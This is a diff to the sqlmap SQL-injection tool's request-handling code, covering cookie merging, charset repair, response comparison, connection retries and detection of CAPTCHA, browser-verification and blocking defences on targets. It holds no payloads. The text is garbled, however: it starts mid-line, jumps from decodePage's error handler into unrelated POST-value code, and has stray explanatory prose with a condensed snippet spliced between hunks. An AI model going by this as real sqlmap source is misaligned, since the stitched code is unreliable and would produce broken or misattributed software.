" % HTTP_HEADER.COOKIE message += "The target URL provided its own cookies within " message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE - message += "Do you want to merge them in futher requests? [Y/n] " - _ = readInput(message, default="Y") - kb.mergeCookies = not _ or _[0] in ("y", "Y") + message += "Do you want to merge them in further requests? [Y/n] " + + kb.mergeCookies = readInput(message, default='Y', boolean=True) if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: - _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x) + _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x) headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: @@ -110,14 +116,14 @@ def forgeHeaders(items=None): conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] elif not kb.testMode: - headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value)) + headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value)) - if kb.testMode and not conf.csrfToken: + if kb.testMode and not any((conf.csrfToken, conf.safeUrl)): resetCookieJar(conf.cj) return headers -def parseResponse(page, headers): +def parseResponse(page, headers, status=None): """ @param page: the page to parse to feed the knowledge base htmlFp (back-end DBMS fingerprint based upon DBMS error messages return @@ -129,8 +135,9 @@ def parseResponse(page, headers): headersParser(headers) if page: - htmlParser(page) + htmlParser(page if not status else "%s\n\n%s" % (status, page)) +@cachedmethod def checkCharEncoding(encoding, warn=True): """ Checks encoding name, repairs common misspellings and adjusts to @@ -148,17 +155,21 @@ def checkCharEncoding(encoding, warn=True): return encoding # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"} + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() + encoding = encoding.replace(""", "") + # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 + elif "8895" in encoding: + encoding = encoding.replace("8895", "8859") # iso-8895 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: @@ -187,24 +198,35 @@ def checkCharEncoding(encoding, warn=True): encoding = "ascii" elif encoding.find("utf8") > 
0: encoding = "utf8" + elif encoding.find("utf-8") > 0: + encoding = "utf-8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] - elif encoding in ("null", "{charset}", "*"): + elif encoding in ("null", "{charset}", "charset", "*") or not re.search(r"\w", encoding): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: - codecs.lookup(encoding) - except LookupError: + codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding) + except (LookupError, ValueError): if warn: warnMsg = "unknown web page charset '%s'. " % encoding warnMsg += "Please report by e-mail to 'dev@sqlmap.org'" singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None + if encoding: + try: + unicode(randomStr(), encoding) + except: + if warn: + warnMsg = "invalid web page charset '%s'" % encoding + singleTimeLogMessage(warnMsg, logging.WARN, encoding) + encoding = None + return encoding def getHeuristicCharEncoding(page): @@ -212,7 +234,10 @@ def getHeuristicCharEncoding(page): Returns page encoding charset detected by usage of heuristics Reference: http://chardet.feedparser.org/docs/ """ - retVal = detect(page)["encoding"] + + key = hash(page) + retVal = kb.cache.encoding.get(key) or detect(page)["encoding"] + kb.cache.encoding[key] = retVal if retVal: infoMsg = "heuristics detected web page charset '%s'" % retVal @@ -243,15 +268,16 @@ def decodePage(page, contentEncoding, contentType): page = data.read() except Exception, msg: - errMsg = "detected invalid data for declared content " - errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg) - singleTimeLogMessage(errMsg, logging.ERROR) + if "%s" % value, conf.parameters[PLACE.POST]) + else: + msg = "do you want to automatically adjust the value of '%s'? 
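Besides the extra typo repairs (utf-8859-1, iso-8859-0, iso-8895), checkCharEncoding() now verifies that the normalised name both resolves to a Python codec and survives an actual decode before it is trusted, and getHeuristicCharEncoding() caches chardet results per page hash. The sanity check, condensed (the probe string in the patch comes from randomStr()):

    import codecs
    import string

    def usable_charset(name):
        """Accept a charset only if Python knows the codec and it decodes a plain ASCII sample."""
        try:
            codecs.lookup(name)
            unicode(string.ascii_letters, name)   # Python 2; raises if the codec rejects the sample
        except Exception:
            return False
        return True

    # usable_charset("utf8") -> True, usable_charset("{charset}") -> False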
[y/N]" % name + + if not readInput(msg, default='N', boolean=True): + continue + + conf.paramDict[PLACE.POST][name] = value + conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % re.escape(name), r"\g<1>%s" % re.escape(value), conf.parameters[PLACE.POST]) + + if not kb.browserVerification and re.search(r"(?i)browser.?verification", page or ""): + kb.browserVerification = True + warnMsg = "potential browser verification protection mechanism detected" + if re.search(r"(?i)CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + + if not kb.captchaDetected and re.search(r"(?i)captcha", page or ""): + for match in re.finditer(r"(?si)", page): + if re.search(r"(?i)captcha", match.group(0)): + kb.captchaDetected = True + warnMsg = "potential CAPTCHA protection mechanism detected" + if re.search(r"(?i)[^<]*CloudFlare", page): + warnMsg += " (CloudFlare)" + singleTimeWarnMessage(warnMsg) + break if re.search(BLOCKED_IP_REGEX, page): - errMsg = "it appears that you have been blocked by the target server" - singleTimeLogMessage(errMsg, logging.ERROR) + warnMsg = "it appears that you have been blocked by the target server" + singleTimeWarnMessage(warnMsg) diff --git a/lib/request/basicauthhandler.py b/lib/request/basicauthhandler.py index 487dac387..c6e4a3207 100644 --- a/lib/request/basicauthhandler.py +++ b/lib/request/basicauthhandler.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/request/comparison.py b/lib/request/comparison.py index 0cfb53957..82915d281 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -21,10 +21,12 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DIFF_TOLERANCE from lib.core.settings import HTML_TITLE_REGEX from lib.core.settings import MIN_RATIO +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import MAX_RATIO from lib.core.settings import REFLECTED_VALUE_MARKER from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import URI_HTTP_HEADER from lib.core.threads import getCurrentThreadData def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): @@ -47,17 +49,15 @@ def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: - threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" + threadData.lastComparisonHeaders = listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "" threadData.lastComparisonPage = page + threadData.lastComparisonCode = code if page is None and pageLength is None: return None - seqMatcher = threadData.seqMatcher - seqMatcher.set_seq1(kb.pageTemplate) - if any((conf.string, conf.notString, conf.regexp)): - rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) + rawResponse = "%s%s" % (listToStrValue([_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)]) if headers else "", page) # String to match in page when the query is True and/or valid if 
conf.string: @@ -75,9 +75,12 @@ def _comparison(page, headers, code, getRatioValue, pageLength): if conf.code: return conf.code == code + seqMatcher = threadData.seqMatcher + seqMatcher.set_seq1(kb.pageTemplate) + if page: # In case of an DBMS error page return None - if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()): + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: return None # Dynamic content lines to be excluded before comparison @@ -107,48 +110,32 @@ def _comparison(page, headers, code, getRatioValue, pageLength): elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - seq1, seq2 = None, None - - if conf.titles: - seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) - seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + if seqMatcher.a and page and seqMatcher.a == page: + ratio = 1 + elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): + ratio = 1.0 * len(seqMatcher.a) / len(page) + if ratio > 1: + ratio = 1. / ratio else: - seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a - seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + seq1, seq2 = None, None - if seq1 is None or seq2 is None: - return None - - seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - - count = 0 - while count < min(len(seq1), len(seq2)): - if seq1[count] == seq2[count]: - count += 1 + if conf.titles: + seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) + seq2 = extractRegexResult(HTML_TITLE_REGEX, page) else: - break - if count: - seq1 = seq1[count:] - seq2 = seq2[count:] + seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a + seq2 = getFilteredPageContent(page, True) if conf.textOnly else page - while True: - try: - seqMatcher.set_seq1(seq1) - except MemoryError: - seq1 = seq1[:len(seq1) / 1024] - else: - break + if seq1 is None or seq2 is None: + return None - while True: - try: - seqMatcher.set_seq2(seq2) - except MemoryError: - seq2 = seq2[:len(seq2) / 1024] - else: - break + seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") + seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - ratio = round(seqMatcher.quick_ratio(), 3) + seqMatcher.set_seq1(seq1) + seqMatcher.set_seq2(seq2) + + ratio = round(seqMatcher.quick_ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content @@ -157,6 +144,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) + if kb.testMode: + threadData.lastComparisonRatio = ratio + # If it has been requested to return the ratio and not a comparison # response if getRatioValue: @@ -165,6 +155,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): elif ratio > UPPER_RATIO_BOUND: return True + elif ratio < LOWER_RATIO_BOUND: + return False + elif kb.matchRatio is None: return None diff --git a/lib/request/connect.py b/lib/request/connect.py index 8914e6cb0..23b6b44ab 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1,10 +1,11 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers 
(http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import binascii import compiler import httplib import json @@ -30,8 +31,8 @@ from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import asciifyUrl from lib.core.common import calculateDeltaSeconds +from lib.core.common import checkSameHost from lib.core.common import clearConsoleLine -from lib.core.common import cpuThrottle from lib.core.common import dataToStdout from lib.core.common import evaluateCode from lib.core.common import extractRegexResult @@ -40,6 +41,7 @@ from lib.core.common import getCurrentThreadData from lib.core.common import getHeader from lib.core.common import getHostHeader from lib.core.common import getRequestHeader +from lib.core.common import getSafeExString from lib.core.common import getUnicode from lib.core.common import logHTTPTraffic from lib.core.common import pushValue @@ -78,6 +80,7 @@ from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapTokenException from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER @@ -88,6 +91,8 @@ from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE from lib.core.settings import MAX_CONNECTIONS_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS +from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import IS_WIN @@ -95,9 +100,12 @@ from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PERMISSION_DENIED_REGEX from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE +from lib.core.settings import RANDOM_INTEGER_MARKER +from lib.core.settings import RANDOM_STRING_MARKER from lib.core.settings import REPLACEMENT_MARKER from lib.core.settings import TEXT_CONTENT_TYPE_REGEX from lib.core.settings import UNENCODED_ORIGINAL_VALUE +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import WARN_TIME_STDEV from lib.request.basic import decodePage @@ -106,7 +114,6 @@ from lib.request.basic import processResponse from lib.request.direct import direct from lib.request.comparison import comparison from lib.request.methodrequest import MethodRequest -from thirdparty.multipart import multipartpost from thirdparty.odict.odict import OrderedDict from thirdparty.socks.socks import ProxyError @@ -118,7 +125,10 @@ class Connect(object): @staticmethod def _getPageProxy(**kwargs): - return Connect.getPage(**kwargs) + try: + return Connect.getPage(**kwargs) + except RuntimeError: + return None, None, None @staticmethod def _retryProxy(**kwargs): @@ -130,18 +140,21 @@ class Connect(object): logger.warn(warnMsg) conf.proxy = None - setHTTPProxy() + threadData.retriesCount = 0 + + setHTTPHandlers() if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query - warnMsg = "most probably web server instance hasn't 
recovered yet " + warnMsg = "most likely web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " - warnMsg += "persists please wait for few minutes and rerun " - warnMsg += "without flag T in option '--technique' " + warnMsg += "persists please wait for a few minutes and rerun " + warnMsg += "without flag 'T' in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) + elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " @@ -158,13 +171,12 @@ class Connect(object): warnMsg += "with the switch '--random-agent' turned on " warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" singleTimeWarnMessage(warnMsg) + elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) - time.sleep(1) - kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) @@ -183,7 +195,11 @@ class Connect(object): kb.pageCompress = False else: while True: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if not conn: + break + else: + _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) + if len(_) == MAX_CONNECTION_CHUNK_SIZE: warnMsg = "large response detected. This could take a while" singleTimeWarnMessage(warnMsg) @@ -209,13 +225,13 @@ class Connect(object): if isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) - elif conf.cpuThrottle: - cpuThrottle(conf.cpuThrottle) if conf.offline: return None, None, None - elif conf.dummy: - return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None + elif conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0: + if conf.murphyRate: + time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1)) + return getUnicode(randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())), None, None if not conf.murphyRate else randomInt(3) threadData = getCurrentThreadData() with kb.locks.request: @@ -231,25 +247,29 @@ class Connect(object): referer = kwargs.get("referer", None) or conf.referer host = kwargs.get("host", None) or conf.host direct_ = kwargs.get("direct", False) - multipart = kwargs.get("multipart", False) + multipart = kwargs.get("multipart", None) silent = kwargs.get("silent", False) raise404 = kwargs.get("raise404", True) timeout = kwargs.get("timeout", None) or conf.timeout auxHeaders = kwargs.get("auxHeaders", None) response = kwargs.get("response", False) - ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout + ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts refreshing = kwargs.get("refreshing", False) retrying = kwargs.get("retrying", False) crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) skipRead = kwargs.get("skipRead", False) + if multipart: + post = multipart + websocket_ = url.lower().startswith("ws") if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host - target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) + target = checkSameHost(url, conf.url) if not retrying: # Reset the number of connection retries @@ -259,13 +279,17 @@ class Connect(object): # url splitted with 
space char while urlencoding it in the later phase url = url.replace(" ", "%20") + if "://" not in url: + url = "http://%s" % url + conn = None - code = None page = None + code = None + status = None _ = urlparse.urlsplit(url) requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) - requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url + requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url) responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None @@ -287,27 +311,13 @@ class Connect(object): params = urlencode(params) url = "%s?%s" % (url, params) - elif multipart: - # Needed in this form because of potential circle dependency - # problem (option -> update -> connect -> option) - from lib.core.option import proxyHandler - - multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) - conn = multipartOpener.open(unicodeencode(url), multipart) - page = Connect._connReadProxy(conn) if not skipRead else None - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - - return page - - elif any((refreshing, crawling)): + elif any((refreshing, crawling, checking)): pass elif target: if conf.forceSSL and urlparse.urlparse(url).scheme != "https": - url = re.sub("\Ahttp:", "https:", url, re.I) - url = re.sub(":80/", ":443/", url, re.I) + url = re.sub("(?i)\Ahttp:", "https:", url) + url = re.sub("(?i):80/", ":443/", url) if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] @@ -335,6 +345,9 @@ class Connect(object): # Prepare HTTP headers headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) + if HTTP_HEADER.COOKIE in headers: + cookie = headers[HTTP_HEADER.COOKIE] + if kb.authHeader: headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader @@ -350,7 +363,7 @@ class Connect(object): if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" - if post is not None and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): + if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: @@ -362,22 +375,33 @@ class Connect(object): if boundary: headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) + if conf.keepAlive: + headers[HTTP_HEADER.CONNECTION] = "keep-alive" + + # Reset header values to original in case of provided request file + if target and conf.requestFile: + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie}) + if auxHeaders: - for key, item in auxHeaders.items(): + for key, value in auxHeaders.items(): for _ in headers.keys(): if _.upper() == key.upper(): del headers[_] - headers[key] = item + headers[key] = value - for key, item in headers.items(): + for key, value in headers.items(): del headers[key] - headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) + value = 
unicodeencode(value, kb.pageEncoding) + for char in (r"\r", r"\n"): + value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value) + headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n") url = unicodeencode(url) - post = unicodeencode(post, kb.pageEncoding) + post = unicodeencode(post) if websocket_: ws = websocket.WebSocket() + ws.settimeout(timeout) ws.connect(url, header=("%s: %s" % _ for _ in headers.items() if _[0] not in ("Host",)), cookie=cookie) # WebSocket will add Host field of headers automatically ws.send(urldecode(post or "")) page = ws.recv() @@ -389,7 +413,7 @@ class Connect(object): responseHeaders = _(ws.getheaders()) responseHeaders.headers = ["%s: %s\r\n" % (_[0].capitalize(), _[1]) for _ in responseHeaders.items()] - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) + requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()]) requestMsg += "\n%s" % requestHeaders if post is not None: @@ -408,7 +432,7 @@ class Connect(object): else: req = urllib2.Request(url, post, headers) - requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) + requestHeaders += "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()]) if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) @@ -420,7 +444,7 @@ class Connect(object): requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTP_HEADER.CONNECTION): - requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION + requestHeaders += "\n%s: %s" % (HTTP_HEADER.CONNECTION, "close" if not conf.keepAlive else "keep-alive") requestMsg += "\n%s" % requestHeaders @@ -429,9 +453,18 @@ class Connect(object): requestMsg += "\n" - threadData.lastRequestMsg = requestMsg + if not multipart: + threadData.lastRequestMsg = requestMsg - logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) + + if conf.cj: + for cookie in conf.cj: + if cookie.value is None: + cookie.value = "" + else: + for char in (r"\r", r"\n"): + cookie.value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", cookie.value) conn = urllib2.urlopen(req) @@ -446,7 +479,7 @@ class Connect(object): return conn, None, None # Get HTTP response - if hasattr(conn, 'redurl'): + if hasattr(conn, "redurl"): page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO @@ -454,42 +487,53 @@ class Connect(object): else: page = Connect._connReadProxy(conn) if not skipRead else None - code = code or conn.code - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() + if conn: + code = conn.code + responseHeaders = conn.info() + responseHeaders[URI_HTTP_HEADER] = conn.geturl() + else: + code = None + responseHeaders = {} + page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) - status = getUnicode(conn.msg) + status = getUnicode(conn.msg) if conn else None - if 
extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: - url = extractRegexResult(META_REFRESH_REGEX, page) + kb.connErrorCounter = 0 - debugMsg = "got HTML meta refresh header" - logger.debug(debugMsg) + if not refreshing: + refresh = responseHeaders.get(HTTP_HEADER.REFRESH, "").split("url=")[-1].strip() - if kb.alwaysRefresh is None: - msg = "sqlmap got a refresh request " - msg += "(redirect like response common to login pages). " - msg += "Do you want to apply the refresh " - msg += "from now on (or stay on the original page)? [Y/n]" - choice = readInput(msg, default="Y") + if extractRegexResult(META_REFRESH_REGEX, page): + refresh = extractRegexResult(META_REFRESH_REGEX, page) - kb.alwaysRefresh = choice not in ("n", "N") + debugMsg = "got HTML meta refresh header" + logger.debug(debugMsg) - if kb.alwaysRefresh: - if url.lower().startswith('http://'): - kwargs['url'] = url - else: - kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url + if refresh: + if kb.alwaysRefresh is None: + msg = "sqlmap got a refresh request " + msg += "(redirect like response common to login pages). " + msg += "Do you want to apply the refresh " + msg += "from now on (or stay on the original page)? [Y/n]" - threadData.lastRedirectMsg = (threadData.lastRequestUID, page) - kwargs['refreshing'] = True - kwargs['get'] = None - kwargs['post'] = None + kb.alwaysRefresh = readInput(msg, default='Y', boolean=True) - try: - return Connect._getPageProxy(**kwargs) - except SqlmapSyntaxException: - pass + if kb.alwaysRefresh: + if re.search(r"\Ahttps?://", refresh, re.I): + url = refresh + else: + url = urlparse.urljoin(url, refresh) + + threadData.lastRedirectMsg = (threadData.lastRequestUID, page) + kwargs["refreshing"] = True + kwargs["url"] = url + kwargs["get"] = None + kwargs["post"] = None + + try: + return Connect._getPageProxy(**kwargs) + except SqlmapSyntaxException: + pass # Explicit closing of connection object if conn and not conf.keepAlive: @@ -497,22 +541,25 @@ class Connect(object): if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() - except Exception, msg: - warnMsg = "problem occurred during connection closing ('%s')" % msg + except Exception, ex: + warnMsg = "problem occurred during connection closing ('%s')" % getSafeExString(ex) logger.warn(warnMsg) - except urllib2.HTTPError, e: + except urllib2.HTTPError, ex: page = None responseHeaders = None + if checking: + return None, None, None + try: - page = e.read() if not skipRead else None - responseHeaders = e.info() - responseHeaders[URI_HTTP_HEADER] = e.geturl() + page = ex.read() if not skipRead else None + responseHeaders = ex.info() + responseHeaders[URI_HTTP_HEADER] = ex.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " - warnMsg += "to get error page information (%d)" % e.code + warnMsg += "to get error page information (%d)" % ex.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: @@ -522,17 +569,17 @@ class Connect(object): finally: page = page if isinstance(page, unicode) else getUnicode(page) - code = e.code + code = ex.code + status = getUnicode(ex.msg) kb.originalCode = kb.originalCode or code - threadData.lastHTTPError = (threadData.lastRequestUID, code) + threadData.lastHTTPError = (threadData.lastRequestUID, code, status) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 - status = getUnicode(e.msg) responseMsg += "[#%d] (%d 
